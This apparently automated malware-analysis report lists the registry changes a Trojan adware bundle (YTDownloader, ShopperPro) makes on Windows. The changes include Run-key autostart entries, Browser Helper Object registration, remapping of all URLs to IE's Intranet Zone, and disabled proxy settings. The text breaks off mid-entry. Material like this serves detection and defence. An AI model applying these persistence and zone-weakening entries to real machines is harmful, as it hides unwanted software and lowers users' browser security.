[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\TypeLib]
"(Default)" = "{82351433-9094-11D1-A24B-00A0C932C7DF}"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\MiscStatus\1]
"(Default)" = "131473"

[HKCR\CLSID\{6DC82D15-92F2-11D1-A255-00A0C932C7DF}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"

[HKCR\AniGIFPpg2.AniGIFPpg2]
"(Default)" = "AniGIFPpg2 Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCR\AniGIFCtrl.AniGIF\CLSID]
"(Default)" = "{82351441-9094-11D1-A24B-00A0C932C7DF}"

[HKCR\CLSID\{61AB12E1-A5FF-11D1-B2E9-444553540000}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}]
"(Default)" = "IAniGIFEvents"

[HKCR\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}\ProxyStubClsid]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YTDownloader]
"DisplayName" = "YTDownloader"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCR\Interface\{82351440-9094-11D1-A24B-00A0C932C7DF}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{5252AC41-94BB-11D1-B2E7-444553540000}\ProxyStubClsid32]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
"Templates" = "%Documents and Settings%\%current user%\Templates"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\ProgID]
"(Default)" = "AniGIFCtrl.AniGIF"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCR\CLSID\{61AB12E1-A5FF-11D1-B2E9-444553540000}]
"(Default)" = "AniGIFPpg2 Class"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\Version]
"(Default)" = "1.5"

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\Verb]
"(Default)" = ""

[HKCR\CLSID\{6DC82D15-92F2-11D1-A255-00A0C932C7DF}]
"(Default)" = "AniGIFPpg Class"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCR\CLSID\{6DC82D15-92F2-11D1-A255-00A0C932C7DF}\InprocServer32]
"(Default)" = "%Program Files%\YTDownloader\AniGIF.ocx"

[HKCR\AniGIFCtrl.AniGIF\Insertable]
"(Default)" = ""

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"sc.exe" = "A tool to aid in developing services for WindowsNT"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\YTDownloader.exe]
"(Default)" = "%Program Files%\YTDownloader\YTDownloader.exe"

[HKCR\TypeLib\{82351433-9094-11D1-A24B-00A0C932C7DF}\1.5\HELPDIR]
"(Default)" = "%Program Files%\YTDownloader\"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"YTDownloader" = "%Program Files%\YTDownloader\YTDownloader.exe /boot"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"YTDownloader" = "%Program Files%\YTDownloader\YTDownloader.exe /boot"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following registry key(s):

[HKCR\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}\Programmable]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
"MaxConnectionsPerServer"
"MaxConnectionsPer1_0Server"

The process YTDownloader.exe:2364 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 26 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\YTDownloader]
"UserId" = "{3DDADCD7-C12E-426F-B69A-34C6CF1194AE}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "07 7B B5 A2 72 44 50 65 5F 28 C4 A9 37 52 CF C9"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

[HKCU\Software\YTDownloader]
"UserId" = "{3DDADCD7-C12E-426F-B69A-34C6CF1194AE}"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process tcpsvcs.exe:2420 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsv6.tmp\AccDownload.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsv6.tmp\nsProcess.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsv6.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nseB.tmp\setup.exe,"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "97 59 EB 1F 8A 68 B4 7B 7C 97 A0 EF AC B0 AC 3C"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

The process ins_geforce.exe:2480 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A5 60 B2 97 C8 51 E9 FC C5 10 58 C0 08 52 A3 38"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\D:]
"8e4b80.exe" = "8e4b80"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"LangID" = "09 04"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process ShopperPro.exe:2216 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"regsvr32.exe" = "Microsoft(C) Register Server"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\ShopperPro]
"ExeLocation" = "%Program Files%\ShopperPro"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\ShopperPro]
"ChromeExtID" = "ojhagnahfpegocdhlopgljpaafeogmcc"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\ShopperPro]
"CONFIGLOCATION" = "%Documents and Settings%\All Users\Application Data\ShopperPro"

[HKLM\SOFTWARE\ShopperPro\ExtraInfo]
"DBVersion" = "1.0.2.0"

[HKLM\SOFTWARE\ShopperPro]
"DBLocation" = "%Documents and Settings%\All Users\Application Data\ShopperPro"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\ShopperPro]
"Aff" = "obrdc"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\ShopperPro]
"Version" = "3.2.11073.2451"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\ShopperPro]
"ChromeExtFile" = "ShopperPro.crx"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "81 D5 17 8A D8 C0 09 F0 4A 92 39 3D A7 4A 7F F0"

[HKLM\SOFTWARE\ShopperPro]
"UserId" = "99999999-9999-419a-81ef-f6d6dd57081c"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}]
"(Default)" = "ShopperProBHO"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}]
"NoExplore" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process ins_shopperpro.exe:2144 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A8 20 88 9B 7C F6 6D E3 3B 81 D0 B1 10 EB 8C BC"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process regsvr32.exe:2320 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}\InprocServer32]
"(Default)" = "%Documents and Settings%\All Users\Application Data\ShopperPro\ShopperPro.dll"

[HKCR\Interface\{03C0AC00-86DE-4B55-81BA-2E7CD61C51B1}\TypeLib]
"(Default)" = "{8FB1A663-2820-468B-95C4-5060A4C5F413}"

[HKCR\ShopperPro.ShopperProBHO\CurVer]
"(Default)" = "ShopperPro.ShopperProBHO.1"

[HKCR\AppID\{58FDA6AF-67D8-4198-B7CD-94B17532C8D5}]
"(Default)" = "ShopperPro"

[HKCR\AppID\ShopperPro.DLL]
"AppID" = "{58FDA6AF-67D8-4198-B7CD-94B17532C8D5}"

[HKCR\ShopperPro.ShopperProBHO]
"(Default)" = "Shopper Pro"

[HKCR\ShopperPro.ShopperProBHO.1\CLSID]
"(Default)" = "{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}"

[HKCR\TypeLib\{8FB1A663-2820-468B-95C4-5060A4C5F413}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}\ProgID]
"(Default)" = "ShopperPro.ShopperProBHO.1"

[HKCR\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}]
"(Default)" = "Shopper Pro"

[HKCR\Interface\{03C0AC00-86DE-4B55-81BA-2E7CD61C51B1}\TypeLib]
"Version" = "1.0"

[HKCR\ShopperPro.ShopperProBHO\CLSID]
"(Default)" = "{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}"

[HKCR\ShopperPro.ShopperProBHO.1]
"(Default)" = "Shopper Pro"

[HKCR\TypeLib\{8FB1A663-2820-468B-95C4-5060A4C5F413}\1.0\HELPDIR]
"(Default)" = "%Documents and Settings%\All Users\Application Data\ShopperPro"

[HKCR\TypeLib\{8FB1A663-2820-468B-95C4-5060A4C5F413}\1.0]
"(Default)" = "ShopperPro 1.0 Type Library"

[HKCR\Interface\{03C0AC00-86DE-4B55-81BA-2E7CD61C51B1}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9E 48 04 64 EE 0C 15 4F 59 F2 D8 F2 11 7F 87 57"

[HKCR\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}\VersionIndependentProgID]
"(Default)" = "ShopperPro.ShopperProBHO"

[HKCR\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\TypeLib\{8FB1A663-2820-468B-95C4-5060A4C5F413}\1.0\0\win32]
"(Default)" = "%Documents and Settings%\All Users\Application Data\ShopperPro\ShopperPro.dll"

[HKCR\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}\TypeLib]
"(Default)" = "{8FB1A663-2820-468B-95C4-5060A4C5F413}"

[HKCR\Interface\{03C0AC00-86DE-4B55-81BA-2E7CD61C51B1}]
"(Default)" = "IShopperProBHO"

[HKCR\Interface\{03C0AC00-86DE-4B55-81BA-2E7CD61C51B1}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}]
"(Default)" = "ShopperProBHO"

"NoExplorer" = "1"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}]

The process BROWSE~2.EXE:3752 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
